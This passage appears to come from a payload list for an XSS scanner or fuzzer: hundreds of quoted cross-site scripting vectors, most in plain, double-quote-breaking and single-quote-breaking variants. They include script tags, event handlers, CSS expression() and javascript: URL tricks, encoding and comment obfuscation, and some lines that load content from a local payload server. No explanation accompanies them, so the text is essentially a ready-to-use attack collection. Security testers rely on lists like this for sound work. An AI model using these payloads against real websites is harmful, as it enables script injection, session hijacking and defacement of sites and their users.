:
a
l
e
r
t
(
\'
X
S
S
\'
)
"
>
', '<IMG STYLE="X:expr/*X*/ession(alert(1))">', '"><IMG STYLE="X:expr/*X*/ession(alert(1))">', '\'><IMG STYLE="X:expr/*X*/ession(alert(1))">', '<IMG DYNSRC="javascript:alert(1)">', '"><IMG DYNSRC="javascript:alert(1)">', '\'><IMG DYNSRC="javascript:alert(1)">', '<img dynsrc="javascript:alert(1);">', '"><img dynsrc="javascript:alert(1);">', '\'><img dynsrc="javascript:alert(1);">', '<IMG LOWSRC="javascript:alert(1)">', '"><IMG LOWSRC="javascript:alert(1)">', '\'><IMG LOWSRC="javascript:alert(1)">', '<input type="image" dynsrc="javascript:alert(1);">', '"><input type="image" dynsrc="javascript:alert(1);">', '\'><input type="image" dynsrc="javascript:alert(1);">', '<STYLE>li {list-style-image: url("javascript:alert(1)");}</STYLE><UL><LI>X', '"><STYLE>li {list-style-image: url("javascript:alert(1)");}</STYLE><UL><LI>X', '\'><STYLE>li {list-style-image: url("javascript:alert(1)");}</STYLE><UL><LI>X', '<DIV STYLE="width: expression(alert(1));">', '"><DIV STYLE="width: expression(alert(1));">', '\'><DIV STYLE="width: expression(alert(1));">', '<div style="width: expression(alert(1););">', '"><div style="width: expression(alert(1););">', '\'><div style="width: expression(alert(1););">', "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(1)';</STYLE>", '"><STYLE>@im\\port\'\\ja\\vasc\\ript:alert(1)\';</STYLE>', "'><STYLE>@im\\port'\\ja\\vasc\\ript:alert(1)';</STYLE>", '<X STYLE="X:expression(alert(1))">', '"><X STYLE="X:expression(alert(1))">', '\'><X STYLE="X:expression(alert(1))">', 'exp/*<A STYLE=\'no\\X:noX("*//*");X:ex/*X*//*/*/pression(alert(1))\'>', '<STYLE TYPE="text/javascript">alert(1);</STYLE>', '"><STYLE TYPE="text/javascript">alert(1);</STYLE>', '\'><STYLE TYPE="text/javascript">alert(1);</STYLE>', '<STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE>', '"><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE>', '\'><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE>', '<A CLASS=X></A>', '"><A CLASS=X></A>', "'><A CLASS=X></A>", '<STYLE 
type="text/css">BODY{background:url("javascript:alert(1)")}</STYLE>', '"><STYLE type="text/css">BODY{background:url("javascript:alert(1)")}</STYLE>', '\'><STYLE type="text/css">BODY{background:url("javascript:alert(1)")}</STYLE>', '<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">', '"><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">', '\'><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">', "<? echo('<SCR)';echo('IPT>alert(1)</SCRIPT>'); ?>", '"><? echo(\'<SCR)\';echo(\'IPT>alert(1)</SCRIPT>\'); ?>', "'><? echo('<SCR)';echo('IPT>alert(1)</SCRIPT>'); ?>", '<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1)</SCRIPT>">', '"><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1)</SCRIPT>">', '\'><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1)</SCRIPT>">', '<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-', '"><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-', '\'><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-', '<XML ID=0><I><B><IMG SRC="javas<!-- -->cript:alert(1)"></B></I></XML>', '"><XML ID=0><I><B><IMG SRC="javas<!-- -->cript:alert(1)"></B></I></XML>', '\'><XML ID=0><I><B><IMG SRC="javas<!-- -->cript:alert(1)"></B></I></XML>', '<SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '"><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '\'><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', 'a="get";b="URL(\\"";c="javascript:";d="alert(1);\\")";eval(a+b+c+d);', '<?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X<SCRIPT DEFER>alert("X")</SCRIPT>"></BODY></HTML>', '"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X<SCRIPT 
DEFER>alert("X")</SCRIPT>"></BODY></HTML>', '\'><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X<SCRIPT DEFER>alert("X")</SCRIPT>"></BODY></HTML>', '<xml src="javascript:alert(1);">', '"><xml src="javascript:alert(1);">', '\'><xml src="javascript:alert(1);">', '<xml id="X"><a><b><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', '"><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', "'><script>alert(1);</script>", '</ScrIpt><script>alert(1);</script>;</b></a></xml>', '<div datafld="b" dataformatas="html" datasrc="#X"></div>', '"><div datafld="b" dataformatas="html" datasrc="#X"></div>', '\'><div datafld="b" dataformatas="html" datasrc="#X"></div>', '<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(1);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>', '"><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(1);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>', '\'><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(1);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>', '%253cscript%253ealert(1)%253c/script%253e', 'foo\\?; alert(1);//?;', '[b][style="style=width:expre/**/ssion(alert(1))xt]bold[/style][/b]', '[b][style="onmouseover="alert(1);]bold[/style][/b]', '</script><script >alert(1)</script>', '"></script><script >alert(1)</script>', "'></script><script >alert(1)</script>", '?; alert(1); var foo=?', '<img src="" onerror=alert(1)>', '"><img src="" onerror=alert(1)>', '\'><img src="" onerror=alert(1)>', '<img src="" onerror=alert(1);>', '"><img src="" onerror=alert(1);>', '\'><img src="" onerror=alert(1);>', '><img src="x:x" onerror=alert(1)>', 's%22%20style=x:expression(alert(1))', 's%22%20style=%22background:url(javascript:alert(?X?))', 's%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27X%3F%29%29', 
'%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(1);>', '<IMG SRC=" \x0e javascript:alert(1);">', '"><IMG SRC=" \x0e javascript:alert(1);">', '\'><IMG SRC=" \x0e javascript:alert(1);">', '<IMG SRC=" &#14; javascript:alert(1);">', '<SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(1)>', '<<SCRIPT>alert(1);//<</SCRIPT>', '<IMG SRC="javascript:alert(1)"', '<iframe src=http://127.0.0.1:3555/xss_serve_payloads/X.html <', '<SCRIPT>a=/X/', 'alert(a.source)</SCRIPT>', '</TITLE><SCRIPT>alert(1);</SCRIPT>', '<INPUT TYPE="IMAGE" SRC="javascript:alert(1);">', '<BODY BACKGROUND="javascript:alert(1)">', '<BODY ONLOAD=alert(1)>', '<IMG LOWSRC="javascript:alert(1)">', '<BGSOUND SRC="javascript:alert(1);">', '<BR SIZE="&{alert(1)}">', '<STYLE>li {list-style-image: url("javascript:alert('X')");}</STYLE><UL><LI>X', "<IMG SRC='vbscript:msgbox(1)'>", '<IMG SRC="mocha:[code]">', '<IMG SRC="livescript:[code]">', '<img src=\'vbscript:do%63ument.lo%63ation="http://127.0.0.1:3555/xss_serve_payloads/X.html"\'>', '"><img src=\'vbscript:do%63ument.lo%63ation="http://127.0.0.1:3555/xss_serve_payloads/X.html"\'>', '\'><img src=\'vbscript:do%63ument.lo%63ation="http://127.0.0.1:3555/xss_serve_payloads/X.html"\'>', '<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1);">', '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1);">', '<IFRAME SRC="javascript:alert(1);"></IFRAME>', '<FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>', '<TABLE BACKGROUND="javascript:alert(1)">', '<TABLE><TD BACKGROUND="javascript:alert(1)">', '<DIV STYLE="background-image: url(javascript:alert(1))">', '<DIV 
STYLE="background-image:\\0075\\0072\\006C\\0028\'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029\'\\0029">', '<DIV STYLE="background-image: url(&#1;javascript:alert(1))">', '<DIV STYLE="width: expression(alert(1));">', "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(1)';</STYLE>", '<IMG STYLE="X:expr/*X*/ession(alert(1))">', '<X STYLE="X:expression(alert(1))">', 'exp/*<A STYLE=\'no\\X:noX("*//*");', '<STYLE TYPE="text/javascript">alert(1);</STYLE>', '<STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE><A CLASS=X></A>', '<STYLE type="text/css">BODY{background:url("javascript:alert(1)")}</STYLE>', '<SCRIPT>alert(1);</SCRIPT>', '<BASE HREF="javascript:alert(1);//">', '<OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1:3555/xss_serve_payloads/X.html"></OBJECT>', '<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(1)></OBJECT>', '<EMBED SRC="data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', 'a="get"; b="URL(\\""; c="javascript:"; d="alert(1);\\")"; eval(a+b+c+d);', '<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(1);">]]>', '</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>', '<XML ID=0><I><B>&lt;IMG SRC="javas<!-- -->cript:alert(1)"&gt;</B></I></XML>', '<SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>', '<HTML><BODY>', '<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">', '<?import namespace="t" implementation="#default#time2">', '<t:set attributeName="innerHTML" to="X&lt;SCRIPT DEFER&gt;alert(&quot;X&quot;)&lt;/SCRIPT&gt;">', '</BODY></HTML>', "<? 
echo('<SCR)';", "echo('IPT>alert(1)</SCRIPT>'); ?>", '<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert(1)&lt;/SCRIPT&gt;">', '<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-', '<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">X</A>', '<A HREF="http://1113982867/">X</A>', '<A HREF="http://0x42.0x0000066.0x7.0x93/">X</A>', '<A HREF="http://0102.0146.0007.00000223/">X</A>', '<A HREF="h
tt	p://6&#9;6.000146.0x7.147/">X</A>', '<A HREF="//127.0.0.1:3555/xss_serve_payloads/X.html">X</A>', '<A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html">X</A>', '<A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html./">X</A>', '<A HREF="javascript:document.location=\'http://127.0.0.1:3555/xss_serve_payloads/X.html\'">X</A>', '<A HREF="http://www.keralacyberhttp://www.keralacyberforce.in/force.in/">X</A>', '<form id="test" /><button form="test" formaction="javascript:alert(1)">X', '"><form id="test" /><button form="test" formaction="javascript:alert(1)">X', '\'><form id="test" /><button form="test" formaction="javascript:alert(1)">X', '<input onblur=javascript:alert(1) autofocus><input autofocus>', '"><input onblur=javascript:alert(1) autofocus><input autofocus>', "'><input onblur=javascript:alert(1) autofocus><input autofocus>", '<video poster=javascript:alert(1)//<video poster=javascript:alert(1)//></video>', '"><video poster=javascript:alert(1)//></video>', "'><video poster=javascript:alert(1)//></video>", '"><video poster=javascript:alert(1)//<video poster=javascript:alert(1)//></video>', '"><video poster=javascript:alert(1)//></video>', "'><video poster=javascript:alert(1)//></video>", "'><video poster=javascript:alert(1)//<video poster=javascript:alert(1)//></video>", '"><video poster=javascript:alert(1)//></video>', "'><video poster=javascript:alert(1)//></video>", '<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>', '"><head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>', '\'><head><base href="javascript://"/></head><body><a href="/. 
/,alert(1)//#">XXX</a></body>', '<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>', '"><SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>', "'><SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>", '<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>', '"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>', '\'><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>', '<embed src="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></embed>', '"><embed src="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></embed>', '\'><embed src="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></embed>', '<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>', '"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>', '\'><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>', '<b <script>alert(1)//</script>0</script></b>', '"><b <script>alert(1)//</script>0</script></b>', "'><b <script>alert(1)//</script>0</script></b>", '<script src="javascript:alert(1)">', '"><script src="javascript:alert(1)">', '\'><script src="javascript:alert(1)">', '<image src="javascript:alert(1)">', '"><image src="javascript:alert(1)">', '\'><image src="javascript:alert(1)">', '<div style=width:1px;filter:glow onfilterchange=alert(1)>x', '"><div style=width:1px;filter:glow onfilterchange=alert(1)>x', "'><div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>", '"><div style=width:1px;filter:glow onfilterchange=alert(1)>x', '"><div style=width:1px;filter:glow onfilterchange=alert(1)>x', "'><div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>", "'><div style=width:1px;filter:glow onfilterchange=alert(1)>x", 
'"><div style=width:1px;filter:glow onfilterchange=alert(1)>x', "'><div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>", '<? foo="><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">', '<! foo="><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">', '</ foo="><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">', '<? foo="><x foo=\'?><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>\'>">', '<! 
foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">', '<% foo><x foo="%><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">', '<iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.html!X.html></iframe>', '"><iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.html!X.html></iframe>', "'><iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.html!X.html></iframe>", '<iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.gif!X.html></iframe>', '"><iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.gif!X.html></iframe>', "'><iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.gif!X.html></iframe>", '<div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>', '"><div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>', '\'><div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>', '<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">', '"><img[a][b]src=x[d]onerror[c]=[e]"alert(1)">', '\'><img[a][b]src=x[d]onerror[c]=[e]"alert(1)">', '<a href="[a]java[b]script[c]:alert(1)">XXX</a>', '"><a href="[a]java[b]script[c]:alert(1)">XXX</a>', '\'><a href="[a]java[b]script[c]:alert(1)">XXX</a>', '<img src="x` `<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>"` `>', '<img src onerror /" \'"= alt=alert(1)//">', '"><img src onerror /" \'"= alt=alert(1)//">', '\'><img src onerror /" \'"= alt=alert(1)//">', '<title onpropertychange=alert(1)></title><title 
title=></title>', '"><title onpropertychange=alert(1)></title><title title=></title>', "'><title onpropertychange=alert(1)></title><title title=></title>", '<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(1)></a>">', '"><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(1)></a>">', '\'><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(1)></a>">', '<!a foo=x=`y><img alt="`><img src=x:x onerror=alert(2)//">', '"><!a foo=x=`y><img alt="`><img src=x:x onerror=alert(2)//">', '\'><!a foo=x=`y><img alt="`><img src=x:x onerror=alert(2)//">', '<?a foo=x=`y><img alt="`><img src=x:x onerror=alert(3)//">', '"><?a foo=x=`y><img alt="`><img src=x:x onerror=alert(3)//">', '\'><?a foo=x=`y><img alt="`><img src=x:x onerror=alert(3)//">', '<!--[if]><script>alert(1)</script -->', '"><!--[if]><script>alert(1)</script -->', "'><!--[if]><script>alert(1)</script -->", '<!--[if<img src=x onerror=alert(2)//]> -->', '"><!--[if<img src=x onerror=alert(2)//]> -->', "'><!--[if<img src=x onerror=alert(2)//]> -->", '<!-- `<img/src=xx:xx onerror=alert(1)//--!>', '"><!-- `<img/src=xx:xx onerror=alert(1)//--!>', "'><!-- `<img/src=xx:xx onerror=alert(1)//--!>", "<xmp> <% </xmp> <img alt='%></xmp><img src=xx:x onerror=alert(1)//'> <script> x='<%' </script> %>/ alert(2) </script> XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>", '"><xmp> <% </xmp> <img alt=\'%></xmp><img src=xx:x onerror=alert(1)//\'> <script> x=\'<%\' </script> %>/ alert(2) </script> XXX <style> *[\'<!--\']{} </style> -->{} *{color:red}</style>', "'><xmp> <% </xmp> <img alt='%></xmp><img src=xx:x onerror=alert(1)//'> <script> x='<%' </script> %>/ alert(2) </script> XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>", '<frameset onload=alert(1)>', '"><frameset onload=alert(1)>', "'><frameset onload=alert(1)>", '<table background="javascript:alert(1)"></table>', '"><table background="javascript:alert(1)"></table>', '\'><table 
background="javascript:alert(1)"></table>', '<!--<img src="--><img src=x onerror=alert(1)//">', '"><!--<img src="--><img src=x onerror=alert(1)//">', '\'><!--<img src="--><img src=x onerror=alert(1)//">', '<comment><img src="</comment><img src=x onerror=alert(1))//">', '"><comment><img src="</comment><img src=x onerror=alert(1))//">', '\'><comment><img src="</comment><img src=x onerror=alert(1))//">', '<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>', '"><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>', '\'><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>', '<style><img src="</style><img src=x onerror=alert(1)//">', '"><style><img src="</style><img src=x onerror=alert(1)//">', '\'><style><img src="</style><img src=x onerror=alert(1)//">', '<li style=list-style:url() onerror=alert(1)></li>', '"><li style=list-style:url() onerror=alert(1)></li>', "'><li style=list-style:url() onerror=alert(1)></li>", '<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>', '"><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>', "'><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>", '"><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>', '"><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>', "'><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>", "'><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>", '"><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>', "'><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>", '<a style="-o-link:\'javascript:alert(1)\';-o-link-source:current">X</a>', '"><a 
style="-o-link:\'javascript:alert(1)\';-o-link-source:current">X</a>', '\'><a style="-o-link:\'javascript:alert(1)\';-o-link-source:current">X</a>', "<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>", '"><style>p[foo=bar{}*{-o-link:\'javascript:alert(1)\'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>', "'><style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>", '<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d', '"><link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d', "'><link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d", '<style>@import "data:,*%7bx:expression(write(1))%7D";</style>', '"><style>@import "data:,*%7bx:expression(write(1))%7D";</style>', '\'><style>@import "data:,*%7bx:expression(write(1))%7D";</style>', '<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>', '"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>', '\'><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>', "<style>*[{}@import'test.css?]{color: green;}</style>X", '"><style>*[{}@import\'test.css?]{color: green;}</style>X', "'><style>*[{}@import'test.css?]{color: green;}</style>X", "* {-o-link:'javascript:alert(1)';-o-link-source: current;}", '<div style="font-family:\'foo[a];color:red;\';">XXX</div>', '"><div style="font-family:\'foo[a];color:red;\';">XXX</div>', '\'><div style="font-family:\'foo[a];color:red;\';">XXX</div>', '<div style="font-family:foo}color=red;">X', '"><div style="font-family:foo}color=red;">X', '\'><div style="font-family:foo}color=red;">XXX</div>', '"><div 
style="font-family:foo}color=red;">X', '"><div style="font-family:foo}color=red;">X', '\'><div style="font-family:foo}color=red;">XXX</div>', '\'><div style="font-family:foo}color=red;">X', '"><div style="font-family:foo}color=red;">X', '\'><div style="font-family:foo}color=red;">XXX</div>', '<div style="[a]color[b]:[c]red">XXX</div>', '"><div style="[a]color[b]:[c]red">XXX</div>', '\'><div style="[a]color[b]:[c]red">XXX</div>', '<div style="\\63	\\06f
\\0006c\\00006F
\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\ or:blue;">XXX</div>', '"><div style="\\63	\\06f
\\0006c\\00006F
\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\ or:blue;">XXX</div>', '\'><div style="\\63	\\06f
\\0006c\\00006F
\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\ or:blue;">XXX</div>', '<// style=x:expression\\28write(1)\\29>', '"><// style=x:expression\\28write(1)\\29>', "'><// style=x:expression\\28write(1)\\29>", '<style>*{x:expression(write(1))}</style>', '"><style>*{x:expression(write(1))}</style>', "'><style>*{x:expression(write(1))}</style>", '<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>', '"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>', '\'><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>', '<div style="list-style:url(http://foo.f)\\20url(javascript:alert(1));">X</div>', '"><div style="list-style:url(http://foo.f)\\20url(javascript:alert(1));">X</div>', '\'><div style="list-style:url(http://foo.f)\\20url(javascript:alert(1));">X</div>', '<div id=d><div style="font-family:\'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B\'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>', '"><div id=d><div style="font-family:\'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B\'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>', '\'><div id=d><div style="font-family:\'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B\'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>', '<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>', '"><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>', '\'><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>', '<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '\'><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>', '"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '"><div 
style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '\'><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>', '\'><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '\'><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>', '<x style="background:url(\'x[a];color:red;/*\')">XXX</x>', '"><x style="background:url(\'x[a];color:red;/*\')">XXX</x>', '\'><x style="background:url(\'x[a];color:red;/*\')">XXX</x>', '<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>', '</ScrIpt><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>', '"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>', '</ScrIpt><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>', "'><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>", '</ScrIpt><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>', '<script>({0:#0=alert/#0#/#0#(1)})</script>', '</ScrIpt><script>({0:#0=alert/#0#/#0#(1)})</script>', '"><script>({0:#0=alert/#0#/#0#(1)})</script>', '</ScrIpt><script>({0:#0=alert/#0#/#0#(1)})</script>', "'><script>({0:#0=alert/#0#/#0#(1)})</script>", '</ScrIpt><script>({0:#0=alert/#0#/#0#(1)})</script>', "<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", "</ScrIpt><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", '"><script>ReferenceError.prototype.__defineGetter__(\'name\', function(){alert(1)}),x</script>', "</ScrIpt><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", "'><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", "</ScrIpt><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", 
